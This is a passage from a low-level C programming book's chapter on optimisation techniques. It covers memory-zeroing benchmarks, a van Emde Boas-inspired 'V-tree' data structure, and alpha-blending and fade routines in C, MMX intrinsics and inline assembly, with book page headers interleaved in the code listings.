ptr2[0] = val;
ptr1[1] = val;
ptr2[1] = val;
__builtin_prefetch(next3);
ptr1[2] = val;
ptr2[2] = val;
ptr1[3] = val;
ptr2[3] = val;
__builtin_prefetch(next4);
next1 += incr;
next2 += incr;
next3 += incr;
next4 += incr;
ptr1[4] = val;
178 CHAPTER 22. OPTIMISATION TECHNIQUES
ptr2[4] = val;
ptr1[5] = val;
ptr2[5] = val;
ptr1[6] = val;
ptr2[6] = val;
ptr1[7] = val;
ptr2[7] = val;
}
ptr1 = next1;
ptr2 = next2;
ptr1[0] = val;
ptr2[0] = val;
ptr1[1] = val;
ptr2[1] = val;
ptr1[2] = val;
ptr2[2] = val;
ptr1[3] = val;
ptr2[3] = val;
ptr1[4] = val;
ptr2[4] = val;
ptr1[5] = val;
ptr2[5] = val;
ptr1[6] = val;
ptr2[6] = val;
ptr1[7] = val;
ptr2[7] = val;
}
#endif /* BROKEN CODE */
int
main(int argc, char *argv[])
{
profzen(pagezero0, "pagezero0");
profzen(pagezero1, "pagezero1");
profzen(pagezero2, "pagezero2");
profzen(pagezero3, "pagezero3");
profzen(pagezero4, "pagezero4");
profzen(pagezero5, "pagezero5");
profzen(pagezero6, "pagezero6");
profzen(pagezero7, "pagezero7");
profzen(pagezero8, "pagezero8");
profzen(pagezero9, "pagezero9");
profzen(pagezero10, "pagezero10");
profzen(pagezero11, "pagezero11");
profzen(pagezero12, "pagezero12");
// profzen(pagezero13, "pagezero13");
exit(0);
}
22.10. DATA EXAMPLES 179
Here are the minimum run times (those are the ones that count here) I saw running
the test several times. They seem consistent; I ran the tests several times. These times
came from the program compiled with compiler optimisations on ( -Oflag with GCC).
pagezero1 took 32 microseconds
pagezero2 took 11 microseconds
pagezero3 took 11 microseconds
pagezero4 took 14 microseconds
pagezero5 took 11 microseconds
pagezero6 took 11 microseconds
pagezero7 took 12 microseconds
This shows that setting words instead of bytes pays back in a marvelous way. Let’s look
at the times without compiler optimisations to see if anything else made difference;
compilers may do things such as unroll loops themselves.
pagezero1 took 110 microseconds
pagezero2 took 102 microseconds
pagezero3 took 102 microseconds
pagezero4 took 81 microseconds
pagezero5 took 63 microseconds
pagezero6 took 63 microseconds
pagezero7 took 63 microseconds
The results are interesting - note how big the impact of compiler optimisations is. The
changes we applied have gained a bit of speed, but it really becomes noticeable only
after we compile with the GCC -Oflag. The latter statistics do show, though, that what
we did was somewhat fruitful. The big speedups were word-size access to memory
and unrolling the loop. As you can see, you should turn optimisations off or lower if
you really want to measure your own code’s execution times in a way to be somewhat
trustworthy.
22.10 Data Examples
22.10.1 Bit Flags
TODO : bitset(), setbit(), clrbit(), getbits(), tagged pointers, examples.
22.10.2 Lookup Tables
Sometimes it’s good to cache (relatively small) sets of computed values into tables and
fetch them based on the operands of such computation. This technique is used later in
this chapter; look at the section Fade In/Out Effects .
TODO : packing character attribute bit flags into tables.
180 CHAPTER 22. OPTIMISATION TECHNIQUES
22.10.3 Hash Tables
TODO
22.10.4 The V-Tree
Here is a hybrid data structure I came up with when investigating van Emde Boas
trees . Even though it is not suitable for sparsely scattered key values (it would eat all
memory in the universe), it’s interesting for what it can be used; the plan is to look into
using it to drive kernel buffer cache. Its main use would be relatively linear key spaces
with no key collisions.
Highlights of this data structure in comparison with hash tables are:
Not counting the (relatively rare) table allocations of this dynamic data structure,
INSERT ,FIND , and DELETE operations work in ’constant’/ predictable time.
The biggest interference with run-time are occasional allocations and dealloca-
tions of internal tables.
The structure can be iterated in key order.
It is relatively easy to implement lookups for the next and previous valued keys.
22.10.4.1 Example Implementation
The listing below has embedded tests to make it easier to explore.
The example implementation below shows using 2-level trees (of tables) and demon-
strates using bitmaps to speed implementations of FINDNEXT and FINDPREV up; it
is noteworthy that with 8-bit level indices, a 256-bit lookup bitmap will fit a single i386
cacheline. It then takes 8 32-bit zero comparisons to spot an empty subtree, which is
much faster than 256 32-bit [pointer] comparisons.
Source Code
/*
* Copyright (C) 2008-2010 Tuomo Petteri Venäläinen. All rights reserved.
*/
#define NTESTKEY (64 * 1024)
#define TEST 1
#define CHK 0
#define PROF 1
#include <stdint.h>
#include <stdlib.h>
#include <limits.h> /* CHAR_BIT */
#include <string.h>
#if (PROF)
#include <unistd.h>
22.10. DATA EXAMPLES 181
#include "cdecl.h"
#include "zen.h"
#endif
#define bitset(p, b) (((uint8_t *)(p))[(b) >> 3] & (1U << ((b) & 0x07)))
#define setbit(p, b) (((uint8_t *)(p))[(b) >> 3] |= (1U << ((b) & 0x07)))
#define clrbit(p, b) (((uint8_t *)(p))[(b) >> 3] &= ~(1U << ((b) & 0x07)))
#if (TEST)
#include <stdio.h>
#endif
#define VAL_SIZE 2
#define KEY_SIZE 2
#if (VAL_SIZE <= 4)
typedef uint32_t vtval_t;
#elif (VAL_SIZE <= 8)
typedef uint64_t vtval_t;
#endif
#if (KEY_SIZE <= 4)
typedef uint32_t vtkey_t;
#elif (KEY_SIZE <= 8)
typedef uint64_t vtkey_t;
#endif
typedef vtval_t _VAL_T;
#define _NKEY (1U << _NBIT)
#define _NBIT (KEY_SIZE * CHAR_BIT)
#define _NLVLBIT (_NBIT >> 1)
#define _EMPTYBYTE 0xff
#define _EMPTYVAL (~(vtval_t)0)
#define _EMPTYKEY (~(vtkey_t)0)
#define _hi(k, n) ((k) >> (n))
#define _lo(k, n) ((k) & ((1U << (n)) - 1))
#define _calloc(n, t) calloc(1 << (n), sizeof(t))
#define _alloc(n, t) malloc((1 << (n)) * sizeof(t))
#if (PROF)
#define _memset(p, b, n) do { *(p)++ = (b); } while (--(n))
#define _flush(p, n) _memset(p, 0xff, n);
#endif
#define _clrtab(p, n) memset(p, _EMPTYBYTE, \
(((1) << (n)) * sizeof(_VAL_T)))
struct _item {
_VAL_T *tab;
vtkey_t minkey;
vtkey_t maxkey;
uint32_t bmap[1U << (_NLVLBIT - 5)];
182 CHAPTER 22. OPTIMISATION TECHNIQUES
} PACK;
struct _tree {
struct _item *tab;
vtval_t *reftab;
vtkey_t nbit;
uint32_t himap[1U << (_NLVLBIT - 5)];
};
static vtval_t vtins(struct _tree *tree, vtkey_t key, vtval_t val);
static vtval_t vtdel(struct _tree *tree, vtkey_t key);
static vtval_t vtfind(struct _tree *tree, vtkey_t key);
static vtval_t vtprev(struct _tree *tree, vtkey_t key);
static vtval_t vtnext(struct _tree *tree, vtkey_t key);
struct _tree *
mkveb(int nkeybit)
{
struct _tree *tree = malloc(sizeof(struct _tree));
vtkey_t nbit = nkeybit >> 1;
unsigned long n = 1U << nbit;
unsigned long ndx = 0;
size_t tabsz;
void *ptr;
struct _item *item;
if (tree) {
tree->nbit = nbit;
tabsz = n * sizeof(struct _item);
ptr = malloc(tabsz);
if (ptr) {
tree->tab = ptr;
item = ptr;
memset(ptr, _EMPTYBYTE, tabsz);
ptr = NULL;
while (ndx < n) {
item->tab = ptr;
ndx++;
item++;
}
tabsz = n * sizeof(vtval_t);
ptr = calloc(1, tabsz);
if (ptr) {
tree->reftab = ptr;
} else {
free(tree->tab);
free(tree);
tree = NULL;
}
} else {
22.10. DATA EXAMPLES 183
free(tree);
tree = NULL;
}
}
return tree;
}
static vtval_t
vtins(struct _tree *tree, vtkey_t key, vtval_t val)
{
vtkey_t nbit = tree->nbit;
vtkey_t hi = _hi(key, nbit);
vtkey_t lo = _lo(key, nbit);
struct _item *treep = &tree->tab[hi];
_VAL_T *tabp = treep->tab;
vtkey_t tkey = _EMPTYKEY;
vtval_t retval = _EMPTYVAL;
if (!tabp) {
treep->minkey = treep->maxkey = tkey;
treep->tab = tabp = _alloc(nbit, _VAL_T);
#if (_EMPTYBYTE != 0)
_clrtab(tabp, nbit);
#endif
}
setbit(tree->himap, hi);
setbit(treep->bmap, lo);
if (tabp) {
tree->reftab[hi]++;
if (lo < treep->minkey || treep->minkey == tkey) {
treep->minkey = lo;
}
if (lo > treep->maxkey || treep->maxkey == tkey) {
treep->maxkey = lo;
}
tabp[lo] = val;
retval = val;
}
return retval;
}
static vtval_t
vtdel(struct _tree *tree, vtkey_t key)
{
vtkey_t nbit = tree->nbit;
vtkey_t hi = _hi(key, nbit);
vtkey_t lo = _lo(key, nbit);
struct _item *treep = &tree->tab[hi];
184 CHAPTER 22. OPTIMISATION TECHNIQUES
_VAL_T *tabp = treep->tab;
_VAL_T *valp;
vtval_t tval = _EMPTYVAL;
vtkey_t tkey = _EMPTYKEY;
vtkey_t lim = 1U << nbit;
vtval_t retval = tval;
vtval_t val;
if (tabp) {
clrbit(treep->bmap, lo);
if (tabp) {
valp = &tabp[lo];
retval = *valp;
if (retval != tval) {
if (!--tree->reftab[hi]) {
clrbit(tree->himap, hi);
free(tabp);
treep->tab = NULL;
treep->minkey = treep->maxkey = tkey;
} else {
*valp = tval;
if (lo == treep->minkey) {
val = _EMPTYVAL;
do {
;
} while ((++lo < lim)
&& ((val = valp[lo]) == _EMPTYVAL));
if (valp[lo] == _EMPTYVAL) {
treep->minkey = tkey;
} else {
treep->minkey = lo;
}
}
if (lo == treep->maxkey) {
val = _EMPTYVAL;
do {
;
} while ((lo--)
&& ((val = valp[lo]) == _EMPTYVAL));
if (val == _EMPTYVAL) {
treep->maxkey = tkey;
} else {
treep->maxkey = lo;
}
}
}
}
}
}
22.10. DATA EXAMPLES 185
return retval;
}
static vtval_t
vtfind(struct _tree *tree, vtkey_t key)
{
vtkey_t nbit = tree->nbit;
vtkey_t hi = _hi(key, nbit);
vtkey_t lo = _lo(key, nbit);
struct _item *treep = &tree->tab[hi];
_VAL_T *tabp = treep->tab;
vtval_t retval = _EMPTYVAL;
if (!tabp) {
return retval;
}
retval = tabp[lo];
return retval;
}
static vtval_t
vtprev(struct _tree *tree, vtkey_t key)
{
vtkey_t nbit = tree->nbit;
vtkey_t hi = _hi(key, nbit);
vtkey_t lo = _lo(key, nbit);
struct _item *treep = &tree->tab[hi];
_VAL_T *tabp = treep->tab;
_VAL_T *valp;
vtkey_t kval;
vtval_t tval = _EMPTYVAL;
vtval_t retval = tval;
uint32_t *himap = tree->himap;
uint32_t *lomap = (treep) ? treep->bmap : NULL;
if (!tabp || treep->minkey == _EMPTYKEY) {
return retval;
}
if (lo > treep->minkey) {
valp = tabp;
do {
;
} while (lo-- > 0 && !bitset(lomap, lo));
retval = valp[lo];
} else {
do {
;
186 CHAPTER 22. OPTIMISATION TECHNIQUES
} while (hi-- > 0 && !bitset(himap, hi));
treep = &tree->tab[hi];
kval = treep->maxkey;
tabp = treep->tab;
retval = tabp[kval];
}
return retval;
}
static vtval_t
vtnext(struct _tree *tree, vtkey_t key)
{
vtkey_t nbit = tree->nbit;
vtkey_t hi = _hi(key, nbit);
vtkey_t lo = _lo(key, nbit);
vtkey_t lim = 1U << nbit;
struct _item *treep = &tree->tab[hi];
_VAL_T *tabp = treep->tab;
_VAL_T *valp;
vtkey_t kval;
vtval_t tval = _EMPTYVAL;
vtval_t retval = tval;
uint32_t *himap = tree->himap;
uint32_t *lomap = (treep) ? treep->bmap : NULL;
if (!tabp || treep->maxkey == _EMPTYKEY) {
return retval;
}
if (lo < treep->maxkey) {
valp = tabp;
do {
;
} while (++lo < lim && !bitset(lomap, lo));
retval = valp[lo];
} else {
do {
;
} while (++hi < lim && !bitset(himap, hi));
treep = &tree->tab[hi];
kval = treep->minkey;
tabp = treep->tab;
retval = tabp[kval];
}
return retval;
}
#if (TEST)
22.10. DATA EXAMPLES 187
#if (PROF)
static uint8_t _mtab[2 * 1048576]; // TODO: fix PAGEALIGN;
#define START_PROF(id) sleep(1); p = _mtab, n = 2 * 1048576; _flush(p, n); zenstartclk(id)
#define STOP_PROF(id, str) zenstopclk(id); fprintf(stderr, "%s\t%lu usecs\n", \
str, zenclkdiff(id))
#else
#define START_PROF(id)
#define STOP_PROF(id, str)
#endif
void
test(void)
{
uint8_t *sysheap = (uint8_t *)sbrk(0);
struct _tree *tree = mkveb(_NBIT);
uint8_t *curheap;
int val;
int i;
#if (PROF)
uint8_t *p;
int n;
zenclk_t clock;
#endif
START_PROF(clock);
for (i = 0 ; i < NTESTKEY - 1 ; i++) {
val = vtins(tree, i, i);
#if (CHK)
if (val != i) {
fprintf(stderr, "insert(1) failed - %d should be %d\n", val, i);
abort();
}
#endif
}
STOP_PROF(clock, "insert\t");
START_PROF(clock);
for (i = 0 ; i < NTESTKEY - 1 ; i++) {
val = vtfind(tree, i);
#if (CHK)
if (val != i) {
fprintf(stderr, "lookup(1) failed - %d should be %d\n", val, i);
abort();
}
#endif
}
STOP_PROF(clock, "lookup\t");
188 CHAPTER 22. OPTIMISATION TECHNIQUES
START_PROF(clock);
for (i = 1 ; i < NTESTKEY - 1 ; i++) {
if (i) {
val = vtprev(tree, i);
#if (CHK)
if (val != i - 1) {
fprintf(stderr, "vtprev(%x) failed (%x)\n", i, val);
abort();
}
#endif
}
}
STOP_PROF(clock, "findprev");
START_PROF(clock);
for (i = 0 ; i < NTESTKEY - 2 ; i++) {
val = vtnext(tree, i);
#if (CHK)
if (val != i + 1) {
fprintf(stderr, "vtnext(%x) failed (%x)\n", i, val);
abort();
}
#endif
}
STOP_PROF(clock, "findnext");
START_PROF(clock);
for (i = 0 ; i < NTESTKEY - 1 ; i++) {
val = vtdel(tree, i);
#if (CHK)
if (val != i) {
fprintf(stderr, "vtdel(%x) failed (%x)\n", i, val);
abort();
}
#endif
}
STOP_PROF(clock, "delete\t");
curheap = (uint8_t *)sbrk(0);
fprintf(stderr, "HEAP:\t\t%u bytes\n", curheap - sysheap);
fprintf(stderr, "RANGE:\t\t%x..%x\n", 0, NTESTKEY - 1);
for (i = 0 ; i < NTESTKEY - 1 ; i++) {
val = vtfind(tree, i);
if (val != _EMPTYVAL) {
fprintf(stderr, "lookup(2) failed\n");
22.11. GRAPHICS EXAMPLES 189
abort();
}
}
return;
}
int
main(int argc,
char *argv[])
{
test();
exit(0);
}
#endif /* TEST */
22.11 Graphics Examples
In this section we shall look at some simple graphical operations.
First, some basic pixel definitions for ARGB32. We use the de facto standard ARGB32
pixel format (32-bit, 8 bits for each of ALPHA, RED, GREEN, and BLUE).
Bytefields
One thing to notice in the following listing is the difference of alphaval() andal-
phaval_p() . The first one is used when you have a pixel packed into a 32-bit word; the
second one lets you fetch individual component bytes from memory to avoid fetching
a whole pixel and doing bitshifts. I decided to call struct argb32 abytefield . Note that
you have to ask the compiler not to try and align struct argb32 better with some kind
of an attribute; we use PACK, which is defined for GCC in <cc.h> .
Source Code
#include "cc.h"
#define ALPHAOFS 24
#define REDOFS 16
#define GREENOFS 8
#define BLUEOFS 0
typedef int32_t argb32_t;
struct argb32 {
uint8_t bval;
190 CHAPTER 22. OPTIMISATION TECHNIQUES
uint8_t gval;
uint8_t rval;
uint8_t aval;
};
/* pix is 32-bit word */
#define alphaval(pix) ((pix) >> ALPHAOFS) // alpha component
#define redval(pix) (((pix) >> REDOFS) & 0xff) // red component
#define greenval(pix) (((pix) >> GREENOFS) & 0xff) // green component
#define blueval(pix) (((pix) >> BLUEOFS) & 0xff) // blue component
/* pointer version; faster byte-fetches from memory */
#define alphaval_p(p) (((struct argb32 *)(p))->aval)
#define redval_p(p) (((struct argb32 *)(p))->rval)
#define greenval_p(p) (((struct argb32 *)(p))->gval)
#define blueval_p(p) (((struct argb32 *)(p))->bval)
/* approximation for c / 0xff */
#define div255(c) \
((((c) << 8) + (c) + 256) >> 16)
/* simple division per 256 by bitshift */
#define div256(c) \
((c) >> 8)
#define alphablendc(src, dest, a) \
((dest) + div255(((src) - (dest)) * (a)))
#define alphablendc2(src, dest, a) \
((dest) + div256(((src) - (dest)) * (a)))
#define alphablendcf(src, dest, a) \
((dest) + (((src) - (dest)) * (a)) / 255.0)
/* compose pixel value from components */
#define mkpix(a, r, g, b) \
(((a) << ALPHAOFS) | ((r) << REDOFS) | ((g) << GREENOFS) | ((b) << BLUEOFS))
#define setpix_p(p, a, r, g, b) \
(((struct argb32 *)(p))->aval = (a), \
((struct argb32 *)(p))->rval = (r), \
((struct argb32 *)(p))->gval = (g), \
((struct argb32 *)(p))->bval = (b))
22.11.1 Alpha Blending
Alpha blending is a technique to combine two pixel values so that the source pixel is
drawn on top of the destination pixel using the alpha value (translucency level) from
the source. This is how modern desktop software implements ’translucent’ windows
and such.
We are going to see some serious bit-twiddling acrobacy; I got the algorithm from
Carsten ’Rasterman’ Haitzler , but all I know of its origins is that it came from some
fellow hacker called Jose.
22.11. GRAPHICS EXAMPLES 191
Note that these routines were implemented as macros to make it easy to drop them into
loops without using (slow) function calls every iteration.
Performance-wise, Jose’s algorithm seems to be the fastest. It took about 3.3 seconds
for a crossfade operation of two 1024x768 images using the first alpha blend routine.
The second one took about 2.9 seconds to execute. Jose’s took about 2.6 seconds. For
the record, the initial floating point routine took a bit over 6 seconds to run.
Towards the end of this section, we take a closer look at how alpha blending works as
well as examine vector programming by developing a couple of MMX versions of our
routines.
22.11.1.1 C Routines
Pixels are alpha blended a component, i.e. one of RED, GREEN or BLUE, at a time.
The formula for computing blended components is
DEST =DEST + ((( SRC  DEST ) ALPHA ) =255 )
where DEST, SRC, and ALPHA are 8-bit component values in the range 0 to 255.
One thing to notice is the divide operation; this tends to be slow for microprocessors
to accomplish, but luckily we have ways around it; note though, that those ways aren’t
100 percent accurate so chances are you don’t want to use them for professional quality
publications and such applications. In this book, we concentrate on their use on on-
screen graphics/images.
Here is an exact floating point algorithm. Note that it uses a divide operation, which
tends to be slow. This one takes about double the time to run in comparison to the
integer routines.
Source Code
#include "pix.h"
#include "blend.h"
#define alphablendf(src, dest, aval) \
do { \
float _a = (aval); \
float _sr = redval_p(src); \
float _sg = greenval_p(src); \
float _sb = blueval_p(src); \
float _dr = redval_p(dest); \
float _dg = greenval_p(dest); \
float _db = blueval_p(dest); \
\
_dr = alphablendcf(_sr, _dr, _a); \
_dg = alphablendcf(_sg, _dg, _a); \
_db = alphablendcf(_sb, _db, _a); \
setpix_p((dest), 0, (uint8_t)_dr, (uint8_t)_dg, (uint8_t)_db); \
} while (FALSE)
192 CHAPTER 22. OPTIMISATION TECHNIQUES
Eliminating the divide operation, the runtime drops by around 25 percent for my test
runs. Still quite a bit slower than the integer routines, but may give more exact output.
Source Code
/* t is table of 256 floats (0 / 0xff through 255.0 / 0xff) */
#define alphablendcf2(src, dest, a, t) \
((dest) + (((src) - (dest)) * (a)) * (t)[(a)])
#define alphablendf2(src, dest, aval) \
do { \
argb32_t _a = (aval); \
float _sr = redval_p(src); \
float _sg = greenval_p(src); \
float _sb = blueval_p(src); \
float _dr = redval_p(dest); \
float _dg = greenval_p(dest); \
float _db = blueval_p(dest); \
\
_dr = alphablendcf2(_sr, _dr, _a); \
_dg = alphablendcf2(_sg, _dg, _a); \
_db = alphablendcf2(_sb, _db, _a); \
setpix_p((dest), 0, (uint8_t)_dr, (uint8_t)_dg, (uint8_t)_db); \
} while (FALSE)
Here is the first integer algorithm. This one should be reasonably good in terms of
output quality. Notice how the macros hide the somewhat tedious pixel component
calculations and make the code easier to digest.
Source Code
#include "pix.h"
#include "blend.h"
#define alphablendhiq(src, dest, aval) \
do { \
argb32_t _a = (aval); \
argb32_t _sr = redval(src); \
argb32_t _sg = greenval(src); \
argb32_t _sb = blueval(src); \
argb32_t _dr = redval(dest); \
argb32_t _dg = greenval(dest); \
argb32_t _db = blueval(dest); \
\
_dr = alphablendc(_sr, _dr, _a); \
_dg = alphablendc(_sg, _dg, _a); \
_db = alphablendc(_sb, _db, _a); \
(dest) = mkpix(0, _dr, _dg, _db); \
} while (FALSE)
#define alphablendhiq_p(src, dest, aval) \
22.11. GRAPHICS EXAMPLES 193
do { \
argb32_t _a = (aval); \
argb32_t _sr = redval_p(src); \
argb32_t _sg = greenval_p(src); \
argb32_t _sb = blueval_p(src); \
argb32_t _dr = redval_p(dest); \
argb32_t _dg = greenval_p(dest); \
argb32_t _db = blueval_p(dest); \
\
_dr = alphablendc(_sr, _dr, _a); \
_dg = alphablendc(_sg, _dg, _a); \
_db = alphablendc(_sb, _db, _a); \
setpix_p((dest), 0, _dr, _dg, _db); \
} while (FALSE)
The next listing is the previous routine modified to use a faster approximation for
divide-by-0xff operations; we simply divide by 256 doing bitshifts. It would seem
to cut a bit over 10 percent off the runtime of our code under some tests.
Source Code
#include "pix.h"
#include "blend.h"
#define alphablendloq(src, dest, aval) \
do { \
argb32_t _a = (aval); \
argb32_t _sr = redval(src); \
argb32_t _sg = greenval(src); \
argb32_t _sb = blueval(src); \
argb32_t _dr = redval(dest); \
argb32_t _dg = greenval(dest); \
argb32_t _db = blueval(dest); \
\
_dr = alphablendc2(_sr, _dr, _a); \
_dg = alphablendc2(_sg, _dg, _a); \
_db = alphablendc2(_sb, _db, _a); \
(dest) = mkpix(0, _dr, _dg, _db); \
} while (FALSE)
#define alphablendloq_p(src, dest, aval) \
do { \
argb32_t _a = (aval); \
argb32_t _sr = redval_p(src); \
argb32_t _sg = greenval_p(src); \
argb32_t _sb = blueval_p(src); \
argb32_t _dr = redval_p(dest); \
argb32_t _dg = greenval_p(dest); \
argb32_t _db = blueval_p(dest); \
\
194 CHAPTER 22. OPTIMISATION TECHNIQUES
_dr = alphablendc2(_sr, _dr, _a); \
_dg = alphablendc2(_sg, _dg, _a); \
_db = alphablendc2(_sb, _db, _a); \
*(dest) = mkpix(0, _dr, _dg, _db); \
} while (FALSE)
The algorithm I told about above; the one that came from Jose. This is about 10 percent
faster than the bitshifting version.
Source Code
#include "pix.h"
#include "blend.h"
/* Jose's fast alphablend-algorithm */
#define alphablendpix(c0, c1, a) \
((((((((c0) >> 8) & 0xff00ff) - (((c1) >> 8) & 0xff00ff)) * (aval)) \
+ ((c1) & 0xff00ff00)) & 0xff00ff00) \
+ (((((((c0) & 0xff00ff) - ((c1) & 0xff00ff)) * (aval)) >> 8) \
+ ((c1) & 0xff00ff)) & 0xff00ff))
#define alphablendfast(src, dest, aval) \
do { \
uint64_t _rbmask = 0x00ff00ff00ff00ffULL; \
argb32_t _gamask = 0xff00ff00ff00ff00ULL; \
argb32_t _srcrb; \
argb32_t _destrb; \
argb32_t _destag; \
argb32_t _val1; \
argb32_t _val2; \
\
_srcrb = (src); \
_destrb = (dest); \
_destag = (dest); \
_srcrb &= _rbmask; \
_destrb &= _rbmask; \
_destag &= _gamask; \
_val1 = (src); \
_val2 = _destag; \
_val1 >>= 8; \
_val2 >>= 8; \
_val1 &= _rbmask; \
_srcrb -= _destrb; \
_val1 -= _val2; \
_srcrb *= (aval); \
_val1 *= (aval); \
_srcrb >>= 8; \
_val1 += _destag; \
_srcrb += _destrb; \
22.11. GRAPHICS EXAMPLES 195
_val1 &= _gamask; \
_srcrb &= _rbmask; \
_val1 += _srcrb; \
(dest) = _val1; \
} while (0)
22.11.1.2 MMX Routines
The basic idea of vectorisation is to work on multiple data operands in parallel; the
term SIMD (Single Instruction, Multiple Data) is commonly used for this.
Remember that alpha blending works by doing computations on pixel components.
These components are 8 bits each. We did find ways to get around the division, but
we still need to do multiplications, which means we can’t do our calculations in 8-bit
registers; there will be overflows. The way MMX comes to the rescue is that we can
represent the 4 components of a pixel as 16-bit values in a 64-bit register (technically,
the alpha component wouldn’t be needed) and effectively do the substraction, multipli-
cation, and addition operations on all those components (as 16-bit subcomponents) in
parallel. We’ll get away with fewer machine operations.
The first listing uses Intel compiler intrinsics for MMX as a way to avoid assembly. As
the intrinsics at the time of writing this don’t cover everything we need (64-bit move
using the MOVQ machine instruction for) and this is a book on low level programming,
we shall next rewrite the routine using inline assembly.
It is noteworthy that one needs to exit MMX mode with the assembly instruction emms
to make the floating-point unit ( i387) work correctly. Therefore, every time you stop
using MMX instructions, do something like
__asm__ __volatile__ ("emms\n");
Here is the intrinsics version of our second integer alpha blending routine.
Source Code
#include <mmintrin.h> /* MMX compiler intrinsics */
#include "pix.h"
#include "blend.h"
/* NOTE: leaves destination ALPHA undefined */
#define alphablendloq_mmx(src, dest, aval) \
do { \
__m64 _mzero; \
__m64 _msrc; \
__m64 _mdest; \
__m64 _malpha; \
__m64 _mtmp; \
\
_mzero = _mm_cvtsi32_si64(0); /* 0000000000000000 */ \
_malpha = _mm_cvtsi32_si64(aval); /* 00000000000000AA */ \
196 CHAPTER 22. OPTIMISATION TECHNIQUES
_mtmp = _mm_slli_si64(_malpha, 16); /* 0000000000AA0000 */ \
_malpha = _mm_or_si64(_mtmp, _malpha); /* 0000000000AA00AA */ \
_mtmp = _mm_slli_si64(_malpha, 32); /* 00AA00AA00000000 */ \
_malpha = _mm_or_si64(_malpha, _mtmp); /* 00AA00AA00AA00AA */ \
_msrc = _mm_cvtsi32_si64(src); /* S:00000000AARRGGBB */ \
_mdest = _mm_cvtsi32_si64(dest); /* D:00000000AARRGGBB */ \
_msrc = _mm_unpacklo_pi8(_msrc, _mzero); /* S:00AA00RR00GG00BB */ \
_mdest = _mm_unpacklo_pi8(_mdest, _mzero); /* D:00AA00RR00GG00BB */ \
_msrc = _mm_sub_pi16(_msrc, _mdest); /* S - D */ \
_msrc = _mm_mullo_pi16(_msrc, _malpha); /* T = (S - D) * A */ \
_msrc = _mm_srli_pi16(_msrc, 8); /* T >> 8 */ \
_mdest = _mm_add_pi8(_msrc, _mdest); /* D = D + T */ \
_mdest = _mm_packs_pu16(_mdest, _mzero); /* D:00000000??RRGGBB */ \
(dest) = _mm_cvtsi64_si32(_mdest); /* DEST = D */ \
} while (FALSE)
In tests, this routine turned out to run about 10 percent faster than the C versions. It is
noteworthy though that Jose’s C algorithm runs faster - good work! :)
Now let’s rewrite this using inline assembly.
Source Code
#include "pix.h"
#include "blend.h"
#define alphablendloq_mmx_asm(src, dest, aval) \
do { \
__asm__ ("pxor %mm0, %mm0\n"); \
__asm__ ("movd %0, %%mm1\n" : : "rm" (src)); \
__asm__ ("movd %0, %%mm2\n" : : "rm" (dest)); \
__asm__ ("movd %0, %%mm3\n" : : "rm" (aval)); \
__asm__ ("punpcklbw %mm0, %mm1\n"); \
__asm__ ("movq %mm3, %mm5\n"); \
__asm__ ("punpcklbw %mm0, %mm2\n"); \
__asm__ ("psllq $16, %mm5\n"); \
__asm__ ("pxor %mm5, %mm3\n"); \
__asm__ ("movq %mm3, %mm5\n"); \
__asm__ ("psllq $32, %mm5\n"); \
__asm__ ("pxor %mm5, %mm3\n"); \
__asm__ ("psubw %mm2, %mm1\n"); \
__asm__ ("movq %mm1, %mm4\n"); \
__asm__ ("pmullw %mm3, %mm4\n"); \
__asm__ ("psrlw $8, %mm4\n"); \
__asm__ ("paddb %mm4, %mm2\n"); \
__asm__ ("packuswb %mm0, %mm2\n"); \
__asm__ __volatile__ ("movd %%mm2, %0\n" : "=rm" (dest)); \
} while (FALSE)
This version turned out to be a very little bit faster than Jose’s algorithm implemented
22.11. GRAPHICS EXAMPLES 197
in C. What’s more interesting, though, is that it cut the runtime of the intrinsics version
down from about 2.8 seconds to 2.6 under a crossfade test of about 100 alphablend
operations of 1024x768 resolution images. Notice that the final MOVD operation must
be declared __volatile__ . Also beware that it’s not a good idea to mix use of regular
variables/registers with MMX code.
22.11.1.3 Cross-Fading Images
As an easter egg to those of you who have kept reading, I will show how to crossfade
an image to another one (fade the first one out and gradually expose the second one on
top of it) using the alphablend routines we have implemented.
In real life, you most likely need to synchronise graphics display after each step; the
details of this are platform-dependent.
#include "pix.h"
#define STEP 0x0f
/* cross-fade from src1 to src2; dest is on-screen data */
void
crossfade(argb32_ *src1, argb32_t *src2, argb32_t *dest,
size_t len)
{
argb32_t val;
size_t nleft;
nleft = len;
while (nleft--) {
for (val = 0 ; val <= 0xff ; val += STEP) {
alphablendfast(src1, dest, 0xff - val);
alphablendfast(src2, dest, val);
}
/* synchronise screen here */
}
/* copy second image intact */
memcpy(dest, src2, len * sizeof(argb32_t));
}
22.11.2 Fade In/Out Effects
Here is a simple way to implement graphical fade in and fade out effects. To use this,
you would loop over graphical data with the val argument to the macros ranging from
0 to 0xff similarly to what we did in the previous code snippet.
I will use the chance of demonstrating a couple of simple optimisation techniques for
this routine. First, it has a division operation and those tend to be slow. That can be
emulated by introducing a table of 256 floats to look the desired value up from. This
made my test run time drop from about 19000 microseconds to around 17000.
198 CHAPTER 22. OPTIMISATION TECHNIQUES
Another way to cut a little bit of the runtime off is to eliminate the (floating point)
multiplication operations as well as the casts between float and argb32_t. both _fmul
and pixel/color component values are 8-bit and so can have 256 different values. This
gives us a table of 256 * 256 values of the type uint8_t (no need for full pixel values),
that is 65536 values. This table uses 64 kilobytes of memory (8-bit values). Chances
are you don’t want to do this at all; I don’t see you needing this routine in games
or other such programs which need the very last bit of performance torn out of the
machine, but you may have other uses for lookup tables so I’ll show you how to do it.
Source Code
#include "pix.h"
/* basic version */
#define fadein1(src, dest, val) \
do { \
argb32_t _rval; \
argb32_t _gval; \
argb32_t _bval; \
float _ftor; \
\
_ftor = (float)val / 0xff; \
_rval = (argb32_t)(_ftor * _gfx_red_val(src)); \
_gval = (argb32_t)(_ftor * _gfx_green_val(src)); \
_bval = (argb32_t)(_ftor * _gfx_blue_val(src)); \
mkpix(dest, 0, _rval, _gval, _bval); \
} while (FALSE)
#define fadeout1(src, dest, val) \
do { \
argb32_t _rval; \
argb32_t _gval; \
argb32_t _bval; \
float _ftor; \
\
_ftor = (float)(0xff - val) / 0xff; \
_rval = (argb32_t)(_ftor * _gfx_red_val(src)); \
_gval = (argb32_t)(_ftor * _gfx_green_val(src)); \
_bval = (argb32_t)(_ftor * _gfx_blue_val(src)); \
mkpix(dest, 0, _rval, _gval, _bval); \
} while (FALSE)
/* use lookup table to eliminate division _and_ multiplication + typecasts */
/*
* initialise lookup table
* u8p64k points to 65536 uint8_t values like in
* uint8_t fadetab[256][256];
*/
#define initfade1(u8p64k) \
do { \
22.11. GRAPHICS EXAMPLES 199
long _l, _m; \
float _f; \
